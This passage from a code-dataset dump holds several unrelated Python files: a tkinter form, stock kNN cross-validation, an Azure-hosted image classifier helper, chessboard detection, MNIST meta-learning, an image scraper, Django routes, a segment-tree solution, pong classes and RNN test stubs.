设置输入框显示的位置,以及长和宽属性\ne2.grid(row=1, column=1, padx=10, pady=5)\n\n\ndef show():\n print(\"会员名称:%s\" % e1.get()) # 获取用户输入的信息\n print(\"会员代号:%s\" % e2.get())\n\nButton(root, text='验证信息', width=10, command=show).grid(row=2, column=0, sticky=W, padx=10, pady=5)\nButton(root, text='退出', width=10, command=root.quit).grid(row=2, column=1, sticky=E, padx=10, pady=5)\n\nmainloop()","sub_path":"输入框和验证输入内容.py","file_name":"输入框和验证输入内容.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"439949869","text":"# kNN-交叉验证\n\nfrom com.lufaxin.stock.service.business.CombinService import CombinService\nfrom com.lufaxin.stock.service.business.ml.KNN_QMZX_NewService import KNN_QMZX_NewService\nfrom com.lufaxin.stock.service.business.StockKnnCrossValidationCalService import StockKnnCrossValidationCalService\nfrom com.lufaxin.stock.service.business.StockKnnLigntAnalogCalService import StockKnnLigntAnalogCalService\nimport time\nimport threading\nfrom com.lufaxin.stock.util import CfgUtil\nfrom com.lufaxin.stock.util import InputCfgUtil\n\n# th_num:2|mid:1\nconfig_str = input(\"Please enter config:\")\n\ncfg = InputCfgUtil.ana_cfg(config_str)\n\nth_num = InputCfgUtil.get_int(cfg, \"th_num\", 1)\nmid = InputCfgUtil.get_int(cfg, \"mid\", 1)\n\nc_v_ser = StockKnnCrossValidationCalService()\nknn_new_ser = KNN_QMZX_NewService()\n\n# 将之前计算的结果清除掉\nc_v_ser.clean_old_val(mid)\n\n# 根据线程数获取分组\nitems_groups, vld_d = c_v_ser.get_group(mid, th_num)\n\nlight_ser = StockKnnLigntAnalogCalService()\n\n# 全部指标数据\n# datas = knn_new_ser.get_cal_data(1, 3500)\ndatas = light_ser.get_between_datas(\"2015-10-01\", \"2018-05-25\")\n\nths = []\n\nfor i in range(0, len(items_groups)):\n items_group = items_groups[i]\n # datas, items, dis_type, val_time, vld_per\n stock_th = threading.Thread(target=c_v_ser.cal_items, args=(datas, items_group, vld_d[\"JLLX\"], vld_d[\"YZCS\"], vld_d[\"YBBL\"], vld_d[\"MID\"]))\n ths.append(stock_th)\n\nif __name__ == '__main__':\n for t in ths:\n t.setDaemon(True)\n t.start()\n for t in ths:\n t.join()\n","sub_path":"com/lufaxin/stock/app/Stock_Knn_Cross_Vld_App.py","file_name":"Stock_Knn_Cross_Vld_App.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"234920090","text":"from PIL import Image\nfrom io import BytesIO\nfrom azure.storage.blob import *\n\nimport pickle\nimport os.path\nimport json\nimport requests\nimport numpy as np\nimport gzip\n\n# model libraries - these can change, based on the model you are using!\nfrom sklearn.neighbors import KNeighborsClassifier\n\ndef load_model():\n try:\n with open(\"./config.json\", \"r\") as config_file:\n config = json.load(config_file)\n block_blob_service = BlockBlobService(account_name=config['blob']['account_name'], \n account_key=config['blob']['account_key'])\n container = config['model']['container']\n generator = block_blob_service.list_blobs(container)\n model = None\n for blob in generator:\n if(blob.name != config['model']['name']):\n continue\n \n path = \"data/{}\".format(blob.name)\n if(not os.path.exists(path)):\n print('Loading model...')\n block_blob_service.get_blob_to_path(container, blob.name, path)\n\n model = open_model(path)\n print('Model loaded!')\n return model\n except Exception as e:\n raise Exception(\"Model could not be loaded. Error: {}\".format(str(e)))\n\ndef open_model(path):\n if(path[-3:] == \".gz\"):\n model_file = gzip.open(path,'rb')\n else:\n model_file = open(path, 'rb')\n model = pickle.load(model_file,encoding='utf-8')\n return model\n\ndef process_image(img_url):\n o_img = get_image(img_url)\n p_img = pad_image(o_img)\n r_img = reshape_image(p_img)\n r_arr = np.array(r_img)\n n_arr = normalize(r_arr)\n return n_arr\n \ndef label_and_prob(arr, model):\n pred_label = model.predict(arr.flatten().reshape(1,-1))\n pred_prob = model.predict_proba(arr.flatten().reshape(1,-1))\n index = np.where(model.classes_ == pred_label)\n return (pred_label[0], pred_prob[0][index][0])\n\ndef get_image(img_url):\n response = requests.get(img_url)\n new_image = Image.open(BytesIO(response.content)).convert('RGB')\n return new_image\n\ndef pad_image(img, color = (255,255,255)):\n max_size = max(img.size)\n background = Image.new('RGB', (max_size, max_size), color)\n img_w, img_h = img.size\n bg_w, bg_h = background.size\n offset = ((int)((bg_w - img_w) / 2), (int)((bg_h - img_h) / 2))\n background.paste(img, offset)\n return background\n\ndef reshape_image(img, size = (128,128)):\n try:\n img.thumbnail(size, Image.ANTIALIAS)\n return img\n except IOError:\n print('Error')\n\ndef normalize(arr):\n \"\"\"\n Linear normalization\n http://en.wikipedia.org/wiki/Normalization_%28image_processing%29\n \"\"\"\n arr = arr.astype('float')\n # Do not touch the alpha channel\n for i in range(3):\n minval = arr[...,i].min()\n maxval = arr[...,i].max()\n if minval != maxval:\n arr[...,i] -= minval\n arr[...,i] *= ( 255.0 / ( maxval - minval ) )\n return arr","sub_path":"api/modelHelper.py","file_name":"modelHelper.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"274882999","text":"import PIL.Image\nimport matplotlib.pyplot as plt\nimport scipy.ndimage\nimport cv2 # For Sobel etc\nimport numpy as np\nfrom helpers import *\nfrom line_intersection import *\nfrom chess_detect_helper import *\nfrom rectify_refine import *\nimport os\nnp.set_printoptions(suppress=True) # Better printing of arrays\n\nSAVE_RECTIFIED = False # Save rectified images out\nSAVE_PLOT = False # Save plots (doesn't need to visualize)\nSHOW_PLOTS = True # Visualize plots\n\ninput_folder = \"input2\"\noutput_folder = \"rectified\"\nplot_folder = \"plots\"\n\n\nfor i in [23]:\n filename =\"%02d.jpg\" % i\n# for filename in os.listdir(input_folder):\n filepath = \"%s/%s\" % (input_folder,filename)\n output_filename = output_folder+\"/\"+filename[:-3]+\"png\"\n # if (os.path.exists(output_filename)):\n # print(\"%s exists, skipping %s\" % (output_filename, filename))\n # continue\n\n print(\"Processing %s\" % filename)\n img_orig = scaleImageIfNeeded(PIL.Image.open(filepath))\n\n # Grayscale\n img = np.array(img_orig.convert('L')) # grayscale uint8 numpy array\n\n # Local Histogram Equalization\n # TODO : Currently breaks line detection etc., \n # tuning should be optimized with this equalization at some point\n # img = cv2.equalizeHist(img)\n # clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\n # img = clahe.apply(img)\n\n ##################\n ## Find initial set of chess lines in image using hough lines & gradient pruning\n lines_a, lines_b, chess_pts, top_dirs = getChessLinesCorners(img, chessboard_to_screen_ratio = 0.2)\n if (len(chess_pts) < 4):\n lines_a, lines_b, chess_pts, top_dirs = getChessLinesCorners(img, chessboard_to_screen_ratio = 0.15)\n if (len(chess_pts) < 4):\n lines_a, lines_b, chess_pts, top_dirs = getChessLinesCorners(img, chessboard_to_screen_ratio = 0.3)\n if (len(chess_pts) == 0):\n print(\"Couldn't get result for %s, skipping\" % filename)\n continue\n elif (len(chess_pts) < 4):\n print(\"Couldn't get enough chess points: \", lines_a, lines_b, chess_pts, top_dirs)\n continue\n chess_pts = chess_pts[np.argsort(chess_pts[:,0]),:] # Sort by y height (row)\n\n ################## \n # Find initial guess for chessboard corners and generate rectified image\n corners = getCorners(chess_pts, top_dirs)\n\n # Find perspective transform between corners of image to an idealized overhead\n # We add on two tiles in each direction to account for potential missing lines\n # (the assumption being the algorithm should be able to find lines within 2 of edge always)\n # Assume missing up to 4 tiles along an axis\n warped_img, M = getTileImage(img_orig, corners, tile_buffer=1+4, tile_res=66)\n M_inv = np.matrix(np.linalg.inv(M))\n\n ##################\n # Get full chessboard line set on rectified image\n lines_x, lines_y, step_x, step_y = getRectifiedChessLines(warped_img)\n if not len(lines_x) or not len(lines_y):\n print(\"%s : Skipping, not enough lines in warped image\" % filename)\n continue\n\n # Get edges and internal chessboard corners on rectified image\n warp_corners, all_warp_corners = getRectChessCorners(lines_x, lines_y)\n\n # Transform from rectified points back to original points for visualization\n tile_centers = all_warp_corners + np.array([step_x/2.0, step_y/2.0]) # Offset from corner to tile centers\n real_corners, all_real_tile_centers = getOrigChessCorners(warp_corners, tile_centers, M_inv) \n\n tile_res = 64 # Each tile has N pixels per side\n tile_buffer = 1\n better_warped_img, better_M = getTileImage(img_orig, real_corners, tile_buffer=tile_buffer, tile_res=tile_res)\n # _, better_M = getTileImage(img_orig, real_corners, tile_buffer=1+4, tile_res=66)\n\n # Further refine rectified image\n better_warped_img, was_rotated, refine_M = reRectifyImages(better_warped_img)\n # combined_M = better_M\n combined_M = np.matmul(refine_M,better_M)\n\n if was_rotated:\n print(\" tile image was rotated\")\n \n M_inv = np.matrix(np.linalg.inv(combined_M))\n \n # Get better_M based corners\n hlines = vlines = (np.arange(8)+tile_buffer)*tile_res\n hcorner = (np.array([0,8,8,0])+tile_buffer)*tile_res\n vcorner = (np.array([0,0,8,8])+tile_buffer)*tile_res\n ideal_corners = np.vstack([hcorner,vcorner]).T\n ideal_all_corners = np.array(list(itertools.product(hlines, vlines)))\n ideal_tile_centers = ideal_all_corners + np.array([tile_res/2.0, tile_res/2.0]) # Offset from corner to tile centers\n # Get refined real corners\n real_corners, all_real_tile_centers = getOrigChessCorners(ideal_corners, ideal_tile_centers, M_inv)\n # Get final refined rectified warped image for saving\n better_warped_img, _ = getTileImage(img_orig, real_corners, tile_buffer=tile_buffer, tile_res=tile_res)\n\n print(\"Final transform matrix from image to rectified:\\n\", combined_M)\n\n\n if SAVE_RECTIFIED:\n print(\" Saving tile image to %s\" % output_filename)\n PIL.Image.fromarray(better_warped_img).save(output_filename)\n\n if SHOW_PLOTS or SAVE_PLOT:\n ##################\n # Plot Top Left Image, initial corner finding setup\n fig = plt.figure(filename, figsize=(12,8))\n fig.subplots_adjust(left=0.05,right=.95,bottom=0.05,top=.95)\n plt.subplot(221,aspect='equal')\n plt.imshow(img_orig)\n\n # Lines\n for idx, line in enumerate(lines_a):\n x1, y1, x2, y2 = line\n plt.plot([x1,x2], [y1,y2],'b', lw=3, alpha=0.5)\n # plt.text(x1, y1-2,'%s' % idx, color='blue', size=8, alpha=0.5);\n for idx, line in enumerate(lines_b):\n x1, y1, x2, y2 = line\n plt.plot([x1,x2], [y1,y2],'g', lw=3, alpha=0.5)\n\n plt.plot(corners[[0,1,2,3,0],0], corners[[0,1,2,3,0],1], 'r', lw=5)\n\n plt.plot(chess_pts[:,0], chess_pts[:,1], 'ro',ms=3) # Points\n # for idx in range(chess_pts.shape[0]):\n # plt.text(chess_pts[idx,0], chess_pts[idx,1]-2,'%d' % idx, color='red', size=8,);\n\n plt.title('Input chess board + overlay initial prediction')\n plt.axis([0,img_orig.size[0],img_orig.size[1], 0])\n\n ##################\n # Plot Top Right: Rectified image + lines\n plt.subplot(222,aspect='equal')\n plt.imshow(warped_img)\n\n # Overlay rectified lines\n for idx, x_pos in enumerate(lines_x):\n plt.plot([x_pos, x_pos], [min(lines_y), max(lines_y)], 'r', lw=4)\n # plt.text(x_pos, min(lines_y)-10,'%d' % idx, color='red', size=10);\n for idx, y_pos in enumerate(lines_y):\n plt.plot([min(lines_x), max(lines_x)], [y_pos, y_pos], 'g', lw=4)\n # plt.text(min(lines_x)-40, y_pos, '%d' % idx, color='green', size=10);\n plt.title('Rectified image and prediction pass #2')\n plt.axis([0,warped_img.shape[1],warped_img.shape[0], 0])\n \n ##################\n # Plot Bottom Left: Overlay original image\n plt.subplot(223,aspect='equal')\n plt.imshow(img_orig)\n\n # plt.plot(real_corners[:,0], real_corners[:,1], 'ro', ms=5)\n # plt.plot(corners[[0,1,2,3,0],0], corners[[0,1,2,3,0],1], 'b', lw=2)\n plt.plot(real_corners[[0,1,2,3,0],0], real_corners[[0,1,2,3,0],1], 'r', lw=7, alpha=0.75)\n plt.plot(all_real_tile_centers[:,0], all_real_tile_centers[:,1], 'gD-',ms=4,lw=2, alpha=0.75)\n # for i in range(all_real_tile_centers.shape[0]):\n # plt.text(all_real_tile_centers[i,0], all_real_tile_centers[i,1], '%d' % i, color='white', size=8);\n\n plt.title('Overlay: Refined tile positions')\n plt.axis([0,img_orig.size[0],img_orig.size[1], 0])\n\n ##################\n # Plot Bottom Right: Updated tile map\n plt.subplot(224,aspect='equal')\n plt.imshow(better_warped_img)\n \n for i in range(1,8):\n ix = (i+tile_buffer)*tile_res\n iy0 = tile_buffer*tile_res\n plt.plot([ix, ix],\n [iy0,(8+tile_buffer)*tile_res],\n 'r', lw=2)\n plt.text(ix-10, iy0-10, '%d' % i, color='white', size=10, fontweight='heavy');\n \n for i in range(1,8):\n iy = (i+tile_buffer)*tile_res\n ix0 = tile_buffer*tile_res\n plt.plot([ix0,(8+tile_buffer)*tile_res],\n [iy, iy],\n 'g', lw=2)\n plt.text(ix0-25, iy+5, '%d' % i, color='white', size=10, fontweight='heavy');\n\n plt.title('Output refined tile map')\n plt.axis([0,better_warped_img.shape[1],better_warped_img.shape[0], 0])\n\n if SAVE_PLOT:\n output_plot_filename = plot_folder+\"/\"+filename[:-3]+\"png\"\n print(\" Saving plot to %s\" % output_plot_filename)\n plt.savefig(output_plot_filename, bbox_inches='tight')\n\nprint(\"Done\")\n\nif SHOW_PLOTS:\n plt.show()\n\n\n######################\n\n# filename = \"%d.jpg\" % 8\n# img_orig = scaleImageIfNeeded(PIL.Image.open(filename))\n\n# # Grayscale\n# img = np.array(img_orig.convert('L')) # grayscale uint8 numpy array\n\n# # Edges\n# # edges = cv2.Canny(img,50,150,apertureSize = 3)\n# edges = cv2.Canny(img,200,500,apertureSize = 3, L2gradient=False) # Better thresholds\n\n# # Gradients\n# sobelx = cv2.Sobel(img,cv2.CV_64F,1,0,ksize=5)\n# sobely = cv2.Sobel(img,cv2.CV_64F,0,1,ksize=5)\n# grad_mag = np.sqrt(sobelx**2+sobely**2)\n\n# # Hough Lines Probabilistic\n\n# chessboard_to_screen_ratio = 0.25\n# min_chessboard_line_length = chessboard_to_screen_ratio * min(img.shape)\n# # TODO: This varys based on the chessboard to screen ratio, for chessboards filling the screen, we want to hop further\n# max_line_gap = min_chessboard_line_length / 8.0 * 1.5 # Can hop up to one missing square\n# # line_threshold = int(min_chessboard_line_length * 0.5)\n# print(\"Min Chessboard Line Length: %g\" % min_chessboard_line_length)\n# print(\"Max Line gap: %g\" % max_line_gap)\n# # print(\"Line threshold: %d\" % line_threshold)\n\n# lines = cv2.HoughLinesP(edges,1,np.pi/360.0, 30, minLineLength = min_chessboard_line_length, maxLineGap = max_line_gap)[:,0,:]\n# print(\"Number of lines: %d\" % len(lines))\n\n# fig1 = plt.figure(figsize=(20,8))\n# plt.subplot(121)\n# freqs = np.zeros(lines.shape[0])\n# good_lines = np.zeros(lines.shape[0])\n# edge_ratios = np.zeros(lines.shape[0])\n# norm_grads = np.zeros(lines.shape[0])\n# for idx in range(lines.shape[0]):\n# if idx > 100:\n# break\n# line = lines[idx,:]\n# is_good, strongest_freq, normal_gradients, fft_result, edge_ratio, avg_normal_gradient = getLineGradients(line, sobelx, sobely, grad_mag)\n# freqs[idx] = strongest_freq\n# good_lines[idx] = is_good\n# edge_ratios[idx] = edge_ratio\n# norm_grads[idx] = avg_normal_gradient\n# if is_good:\n# # print(idx, strongest_freq)\n# plt.plot(normal_gradients + idx*2.5)\n# plt.plot([0,600], [idx*2.5, idx*2.5],'k:')\n# plt.text(600-20, idx*2.5 + 0.1,'%s' % idx, color='green', size=8);\n# # plt.text(600-300, idx*2.5 + 0.1,'freq: %s, edge: %.2f' % (strongest_freq, edge_ratio), color='green', size=8);\n# else:\n# plt.plot(normal_gradients + idx*2.5, 'k', alpha=0.25)\n# plt.plot([0,600], [idx*2.5, idx*2.5],'k:',alpha=0.25)\n# plt.text(600-20, idx*2.5 + 0.1,'%s' % idx, color='black', size=8);\n# # plt.text(600-300, idx*2.5 + 0.1,'freq: %s, edge: %.2f' % (strongest_freq, edge_ratio), color='black', size=8);\n\n# print(\"Number of good lines: %d\" % np.sum(good_lines))\n# # Get angles and segment lines up\n# angles = np.zeros(lines.shape[0])\n# for idx in range(lines.shape[0]):\n# line = lines[idx,:]\n# angles[idx] = getSegmentAngle(line)\n\n# segments = segmentAngles(angles, good_lines)\n\n# top_two_segments = chooseBestSegments(segments, norm_grads)\n\n# # Update good_mask to only include top two groups\n# a_segment = segments == top_two_segments[0]\n# b_segment = segments == top_two_segments[1]\n# good_mask = a_segment | b_segment \n\n# a_segment_idxs = np.argwhere(a_segment).flatten()\n# b_segment_idxs = np.argwhere(b_segment).flatten()\n\n# # print(\"segments\",segments)\n# # print(\"top two\", top_two_segments)\n# # print(\"good\", good_lines)\n# # print(\"freq\", freqs)\n# # print(\"edge\", edge_ratios)\n# # print(\"angles\", np.floor(angles*180/np.pi))\n\n# # Plot image\n# plt.subplot(122)\n# plt.imshow(img_orig)\n# # plt.imshow(edges)\n# plt.axis('equal')\n\n# colors = 'krgbykrcmykrgbykcmyk'\n\n# for k in a_segment_idxs:\n# line = lines[k,:]\n# x1, y1, x2, y2 = line\n# plt.plot([x1,x2], [y1,y2],'%s' % colors[segments[k]], lw=2)\n# plt.text(x1, y1-2,'%s' % k, color='blue', size=8);\n\n# for k in b_segment_idxs:\n# line = lines[k,:]\n# x1, y1, x2, y2 = line\n# plt.plot([x1,x2], [y1,y2],'%s' % colors[segments[k]], lw=2)\n# plt.text(x1, y1-2,'%s' % k, color='blue', size=8);\n\n\n\n# for k, [is_good, [x1,y1,x2,y2]] in enumerate(zip(good_mask, lines)):\n# if ~is_good:\n# plt.plot([x1,x2],[y1,y2], 'c', alpha=0.25)\n# plt.text(x1, y1-2,'%s' % k, color='blue', size=8, alpha=0.5);\n\n# # Plot intersections\n# chess_pts = getAllLineIntersections(lines[a_segment_idxs], lines[b_segment_idxs])\n# pruned_chess_pts = prunePoints(chess_pts,max_dist2=5**2)\n\n# # plt.plot(pruned_chess_pts[:,0], pruned_chess_pts[:,1], 'go',ms=2)\n\n# better_chess_pts = pruned_chess_pts.copy()\n# criteria = (cv2.TERM_CRITERIA_MAX_ITER + cv2.TERM_CRITERIA_COUNT, 30, 0.01)\n# # better_chess_pts = cv2.cornerSubPix(img, better_chess_pts.astype(np.float32), (4,4), (-1,-1), criteria)\n# plt.plot(better_chess_pts[:,0], better_chess_pts[:,1], 'ro',ms=5)\n# print(\"Have %d points\" % better_chess_pts.shape[0])\n\n# plt.show()","sub_path":"chessboard_detect.py","file_name":"chessboard_detect.py","file_ext":"py","file_size_in_byte":13001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"636024561","text":"import numpy as np\nimport tensorflow as tf\nimport argparse\nfrom models.classifiers import MNISTClassifier\nfrom components.learners import Learner\nimport data.mnist as mnist\n\nparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--load_params', help='', action='store_true', default=False)\nparser.add_argument('--num_inner_iters', help='', default=10, type=int)\nargs = parser.parse_args()\n\nmeta_train_set, meta_val_set, meta_test_set = mnist.load(data_dir=\"~/scikit_learn_data\", num_classes=5, batch_size=5, split=[5./7, 1./7, 1./7], return_meta=True)\n\n\n\nmodel = MNISTClassifier(num_classes=5, inputs=None, targets=None)\nupdate_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\nwith tf.control_dependencies(update_ops):\n optimizer = tf.train.AdamOptimizer(1e-4).minimize(model.loss)\n\nglobal_init_op = tf.global_variables_initializer()\n\nsaver = tf.train.Saver()\nsave_dir = \"/data/ziz/jxu/hmaml-saved-models\"\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nwith tf.Session(config=config) as sess:\n\n\n acc_arr = []\n for dk in range(20):\n\n sess.run(global_init_op)\n\n if args.load_params:\n ckpt_file = save_dir + '/params_' + \"mnist\" + '.ckpt'\n print('restoring parameters from', ckpt_file)\n saver.restore(sess, ckpt_file)\n\n print(dk, \"resample dataset...\")\n train_set, val_set = meta_train_set.sample_mini_dataset(num_classes=5, num_shots=15, test_shots=5, classes=[0,1,2,3,4])\n\n learner = Learner(session=sess, model=model)\n accs = []\n for epoch in range(args.num_inner_iters):\n # print(epoch, \"......\")\n learner.train(train_set, optimizer)\n evals = learner.evaluate(val_set)\n accs.append(evals[\"accuracy\"])\n acc_arr.append(accs)\n m = np.array(acc_arr)\n\n print(m.mean(0))\n\n\n # train_set, test_set = meta_train_set.sample_mini_dataset(num_classes=5, num_shots=15, test_shots=5, classes=[5,6,7,8,9])\n # learner = Learner(session=sess, model=model)\n # for epoch in range(20):\n # print(epoch, \"......\")\n # learner.train(train_set, optimizer)\n # evals = learner.evaluate(test_set)\n # print(evals)\n\n # saver.save(sess, save_dir + '/params_' + \"mnist\" + '.ckpt')\n","sub_path":"run_meta_mnist_test.py","file_name":"run_meta_mnist_test.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"412246629","text":"import requests\nimport re\nimport lxml\nimport os\nfrom bs4 import BeautifulSoup\nheaer = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.6788.400 QQBrowser/10.3.2727.400'\n }\nresponse = requests.get('http://www.btshoufa.net/forum-52-1.html').text\npattern = re.compile('(.*?)',re.S)\nresult = re.findall(pattern,response)\nfor li in result:\n url = 'http://www.btshoufa.net/%s'%li[0]\n paths = 'F://%s//'%li[1]\n if os.path.exists(paths) ==False:\n os.makedirs(paths)\n ru = requests.get(url,headers = heaer)\n ru.encoding=ru.apparent_encoding\n rus=ru.text\n soup = BeautifulSoup(rus,'lxml')\n sus = soup.select('.t_f img')\n for i,su in enumerate(sus):\n try:\n ss = su['file']\n rs = requests.get(ss)\n with open(paths+str(i)+'.jpg','wb') as f:\n f.write(rs.content)\n f.close()\n except:\n ''\n finally:\n print('第%d张'%i)\n \nprint('打印完成')\n","sub_path":"很久很久以前写的爬虫代码/爬取bs4图片.py","file_name":"爬取bs4图片.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"142502621","text":"from django.conf.urls import include, url\nfrom webhook_handler import WebHookView\nfrom django.contrib import admin\n\nfrom rest_framework import routers\nimport views\n\n\nrouter = routers.SimpleRouter()\nrouter.register(r'patients', views.PatientViewSet)\nrouter.register(r'appointments', views.AppointmentViewSet)\nrouter.register(r'doctors', views.DoctorViewSet)\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^setup/$', views.SetupView.as_view(), name='setup'),\n url(r'^welcome/$', views.DoctorWelcome.as_view(), name='welcome'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^hook/', WebHookView.as_view()),\n url(r'', include('social.apps.django_app.urls', namespace='social')),\n]\nurlpatterns += router.urls\n","sub_path":"drchrono/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"135808239","text":"# input()\n# int(input())\n# map(int, input().split())\n# list(map(int, input().split()))\n# list(map(int, list(input()))) # スペースがない数字リストを読み込み\nimport math\nimport fractions\nimport sys\nimport bisect\nimport heapq # 優先度付きキュー(最小値取り出し)\nimport collections\nfrom collections import Counter\nfrom collections import deque\nimport pprint\n\nsr = lambda: input()\nir = lambda: int(sr())\nlr = lambda: list(map(int, sr().split()))\n\n\"\"\"nを素因数分解\"\"\"\n\"\"\"2以上の整数n => [[素因数, 指数], ...]の2次元リスト\"\"\"\n\n\ndef factorization(n):\n arr = []\n temp = n\n if n == 1:\n return arr\n\n for i in range(2, int(-(-n ** 0.5 // 1)) + 1):\n if temp % i == 0:\n cnt = 0\n while temp % i == 0:\n cnt += 1\n temp //= i\n arr.append([i, cnt])\n\n if temp != 1:\n arr.append([temp, 1])\n\n if arr == []:\n arr.append([n, 1])\n\n return arr\n\n\n# a^n\ndef power(a, n, mod):\n x = 1\n while n:\n if n & 1:\n x *= a % mod\n n >>= 1\n a *= a % mod\n return x % mod\n\n\n# n*(n-1)*...*(l+1)*l\ndef kaijo(n, l, mod):\n if n == 0:\n return 1\n a = n\n tmp = n - 1\n while (tmp >= l):\n a = a * tmp % mod\n tmp -= 1\n return a\n\n\ninf = 10 ** 18\nmod = 10 ** 9 + 7\n\n\n# segment tree\n\nclass SegmentTree:\n # 初期化処理\n # f : SegmentTree��のせるモノイド\n # default : fに対する単位元\n def __init__(self, size, f=lambda x, y: x + y, default=0):\n self.size = 2 ** (size - 1).bit_length() # 簡単のため要素数Nを2冪にする\n self.default = default\n self.dat = [default] * (self.size * 2) # 要素を単位元で初期化\n self.f = f\n\n def update(self, i, x):\n i += self.size\n self.dat[i] = x\n while i > 0:\n i >>= 1\n self.dat[i] = self.f(self.dat[i * 2], self.dat[i * 2 + 1])\n\n def query(self, l, r):\n l += self.size\n r += self.size\n lres, rres = self.default, self.default\n while l < r:\n if l & 1:\n lres = self.f(lres, self.dat[l])\n l += 1\n\n if r & 1:\n r -= 1\n rres = self.f(self.dat[r], rres) # モノイドでは可換律は保証されていないので演算の方向に注意\n l >>= 1\n r >>= 1\n res = self.f(lres, rres)\n return res\n\n\nn = ir()\na = lr()\nseg1 = SegmentTree(n, lambda x, y: x + y, 0)\nseg2 = SegmentTree(n, lambda x, y: x + y, 0)\nfor i, num in enumerate(a):\n seg1.update(i, num) # 0オリジンのi個目をnumに更新 O(n)\n seg2.update(i, num) # 0オリジンのi個目をnumに更新 O(n)\nans1 = 0\nans2 = 0\npflag = True\npflag2 = False\nfor i in range(1,n+1):\n now1 = seg1.query(0,i)\n if pflag and now1 <= 0:\n seg1.update(i-1, a[i-1]-now1+1)\n ans1+=(1-now1)\n elif (not pflag) and now1 >= 0:\n seg1.update(i-1, a[i-1]-now1-1)\n ans1+=(now1+1)\n now2 = seg2.query(0,i)\n if pflag2 and now2 <= 0:\n seg2.update(i-1, a[i-1]-now2+1)\n ans2+=(1-now2)\n elif (not pflag2) and now2 >= 0:\n seg2.update(i-1, a[i-1]-now2-1)\n ans2+=(now2+1)\n pflag = not pflag\n pflag2 = not pflag2\nprint(min(ans1,ans2))\n","sub_path":"Python_codes/p03739/s253002076.py","file_name":"s253002076.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"619195781","text":"\"\"\" Fichiers regroupant toutes les classes de notre jeu :\n - Raquette\n - Balle \"\"\"\nimport pygame\nfrom pygame.locals import *\nfrom constantes import *\n\nclass Raquette:\n def __init__(self, x):\n self.x = x\n self.y = 295\n self.direction = RIEN\n self.image = pygame.image.load(\"Img/raquette.png\").convert_alpha()\n self.rect = Rect((self.x, self.y), (largeurP, hauteurP))\n def moove(self, fenetre, direction):\n if self.direction == HAUT and self.y > 0:\n self.y -= VITESSE_RAQUETTE\n if self.direction == BAS and self.y < hauteurE - hauteurP:\n self.y += VITESSE_RAQUETTE\n def collide(self, balle):\n if self.rect.colliderect(balle) == True:\n return True\n\nclass Balle:\n def __init__(self, ecran: pygame.surface):\n self.image = pygame.image.load(\"Img/balle.png\").convert_alpha()\n self.x = (largeurE/2) - 10\n self.y = (hauteurE/2) - 10\n self.vect = [VITESSE_BALLE, -VITESSE_BALLE]\n self.rect = Rect((self.x, self.y), (20,20))\n self.ecran = ecran\n def refresh(self, raquette1, raquette2):\n if raquette1.collide(self.rect) == True :\n self.vect[0] = -self.rect[0] + (randint(100,180) / 1000)\n self.vect[1] += (randint(100,180) / 1000) \n if raquette2.collide(self.rect) == True :\n self.vect[1] = -self.rect[1] + (randint(100,180) / 1000)\n self.vect[0] += (randint(100,180) / 1000) \n if self.y < 0 or self.y > largeurE - 20:\n self.vect[0]\n self.x += self.vect[0]\n self.y += self.vect[1]\n self.ecran.blit(self.image, (self.x, self.y))\n self.ecran.blit(raquette1.image, (raquette1.x, raquette1.y))\n self.ecran.blit(raquette2.image, (raquette2.x, raquette2.y))\n\nclass Game:\n def prepare(self, balle):\n \"\"\"Méthode qui se charge de tout remettre a 0 si besoin\"\"\"\n balle.vect = [VITESSE_BALLE, -VITESSE_BALLE]\n balle.x = (largeurE/2) - 10\n balle.y = (hauteurE/2) - 10\n score_1 = 0\n score_2 = 0\n","sub_path":"classe.py","file_name":"classe.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"352707898","text":"from Node import Node\nfrom Tree import Tree\nfrom utilities import *\nimport numpy as np\nimport pickle\nfrom Model import Model\nfrom unittest import TestCase\n\nnp.random.seed(43)\n\n\nclass RNNBranchCoverage:\n def Stub_validate(self, RNN):\n RNN.tree_val = np.array([2])\n val_cost = 0\n x = RNN.tree_val[0]\n for t in RNN.tree_val:\n tree = RNN.trees[t]\n RNN.calc_outputs(tree)\n val_cost += RNN.get_cost(tree)\n\n return val_cost\n\n def Stub_check_model_veracity(self, RNN):\n output = []\n RNN.epochs = 1\n RNN.tree_train = (2, 10)\n delta_w = np.zeros(RNN.w.shape)\n delta_ws = np.zeros(RNN.ws.shape)\n for i in xrange(RNN.epochs):\n numgrad = None\n for t in RNN.tree_train:\n tree = RNN.trees[t]\n RNN.calc_outputs(tree)\n RNN.calc_errors(tree, delta_w, delta_ws)\n if numgrad is not None:\n numgrad += RNN.numerical_gradient(tree)\n else:\n numgrad = RNN.numerical_gradient(tree)\n\n scale = 1. / len(RNN.tree_train)\n numgrad *= scale\n RNN.scale_regularize(delta_w, delta_ws, scale)\n 